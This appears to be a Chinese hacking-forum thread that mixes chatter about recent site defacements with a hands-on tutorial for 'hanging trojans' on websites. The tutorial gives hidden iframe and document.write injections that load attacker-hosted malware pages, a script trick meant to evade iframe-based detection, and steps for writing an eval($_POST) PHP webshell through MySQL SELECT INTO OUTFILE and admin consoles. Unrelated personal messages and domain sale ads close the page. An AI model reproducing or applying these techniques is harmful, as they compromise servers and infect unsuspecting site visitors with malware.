这些东东不错哦，
收藏了

https://www.xfocus.net/bbs/index.php?act=ST&f=12&t=59720
https://www.xfocus.net/bbs/index.php?act=ST&f=12&t=56956&view=old  
这个是安焦的人给的回复
大伙看看吧
别弄出笑话来

不知道群里谁说了一句“做安全的被黑那很正常”

想想也是！！
谁敢说有绝对的安全！

这个月初的时候，就是N多网站被搞了，其中包括163，黑鹰等等。
但这两天更突出！

9you被拿下webshell
discuz首页被改

不是吧，这N
安焦也被挂了

去看了下,最近黑站的人N多哦

安全焦点也被黑了???郁闷

呵呵~~不知道

quote site exec "start c:\l.exe"

挂马时用的都是<iframe src=http://www.sohu.com/mm.htm width=0 height=0></iframe>这样的源码，但是浏览被挂的时候，状态栏会显示挂马的链接，在mm.htm或被挂的页面加上一句<body onload=window.status="被挂站的网址">可能会好一点点儿。

2.网站挂马的技巧（js法）
一般的办法是在一个地方写上<iframe src="muma.htm" width="0" height="0" frameborder="0"></iframe> 这样就可以访问muma的页面了

升级一下

先找找主页里面是否有JS的脚本,找到script language="javascript" src="/xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)

document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://XXXXX.com/ma.htm"frameBorder=0width=0scrolling=noheight=0to ... gin="0"></IFRAME>');

以上代码中的http://XXXXX.com/ma.htm ,换成你自己的网页木马的地址.

再把修改好的JS上传覆盖原来的JS,就可以了.

哈哈...是不是很隐蔽了!

另外，这一句同样不错，用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破

<script>
file://window.showModelessDialog("javascript :window.open('http://2112.3322.com/mm/ray.htm' ,'k','top=3000,left=3000,width=0,height=0');

window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>

后台需要有mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件，因为所有的数据是存放在mysql里的，所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径’ 就可以获得了一个<?eval($_POST[a]);?>的最小马

'

0x3C3F6576616C28245F504F53545B615D293B3F3E 是我们<?eval($_POST[a]);?>的十六进制，这种方法对phpmyadmin比较普遍，先利用phpmyadmin的路径泄露漏洞，比较典型的 是http://url/phpmyadmin/libraries/select_lang.lib.php。


就可以暴出路径，php环境中比较容易暴出绝对路径：）。提一点的是遇到是mysql在win系统下路径应该这样写d:\\wwwroot\\a.php。下面的方法是比较常用的一个导出webshell的方法，也可以写个vbs添加系统管理员的脚本导出到启动文件夹，系统重起后就会添加一个管理员帐号

CREATE TABLE a(cmd text NOT NULL)

INSERT INTO a(cmd) VALUES('<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>')    


select cmd from a into outfile '路径/b.php'

DROP TABLE IF EXISTS a

访问b.php就会生成一个<?eval($_POST[a]);?>的最小马。

如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码：

<?

$sa = fopen("./up/saiy.php","w");

fwrite($sa,"<?eval(\$_POST[a]);?".">");

fclose($sa);

?>


就会在up目录下生成文件名为saiy.php内容为<?eval($_POST[a]);?>的最小php木马，

最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 将会在当前目录生成一个a.php的最小马。

打击我哦  瑞星一点反应都没  劣等 我晕哦 哭...最近瑞星真打击

seen


签名：My Blog (酱油小子)
----------------------------
http://xiangtool.googlepages.com/post.htm

本地安全策略中.......

www.cnbase.org  [中国基地]
www.fbi.org.cn
以上俩域名也出售
有意者请与本人联系
无诚意者勿扰。

原来你是这么支持....这么鼓动...

这个是我的 ~ 嘿嘿
http://www.goqoo.la/friend/Show_Friend.aspx?M_ID=142416

TO：小静
哈哈，不错哦，不是不让人叫了小静了呢
晕

TO：小糖
现在还好吗？
好时间不联系了？

塞翁失马....丢了旧了还有MM给你送新的  恭喜下哈
既然你那么支持 偶也去跟帅哥聊聊去....

以后我再送一条`！开心点噢`！
小糖和小泽都要加油~！